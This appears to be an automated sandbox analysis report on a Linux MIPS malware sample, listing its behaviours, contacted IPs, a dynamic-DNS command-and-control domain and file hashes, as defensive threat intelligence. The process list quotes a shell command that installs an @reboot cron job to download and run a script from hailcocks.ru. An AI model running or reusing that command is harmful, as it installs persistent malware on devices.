Analysis Overview
SHA256
9cb34a4c41186002a0d523d847cf95c4e099ac6c61a03888ad9e58e303be1d8f
Threat Level: Shows suspicious behavior
The file 2bc1855eb4297c28116e412b6705e14a.bin was found to show suspicious behavior.
Malicious Activity Summary
Renames itself
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 01:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 01:07
Reported
2024-10-28 01:10
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Destination IP | 139.84.165.176 | N/A | N/A |
| Destination IP | 185.181.61.24 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /var/spool/cron/crontabs/tmp.22OlBk | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Reads runtime system information
Processes
/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| IN | 139.84.165.176:53 | kingstonwikkerink.dyn | udp |
| NO | 185.181.61.24:53 | kingstonwikkerink.dyn | udp |
| GB | 91.149.238.18:15088 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.22OlBk
| Hash | Value |
| --- | --- |
| MD5 | 7f870874f6e2e8a519bfb12fd9595bae |
| SHA1 | a06aa499becd5f448356d6dcd76441142f5f4142 |
| SHA256 | 09cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d |
| SHA512 | f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620 |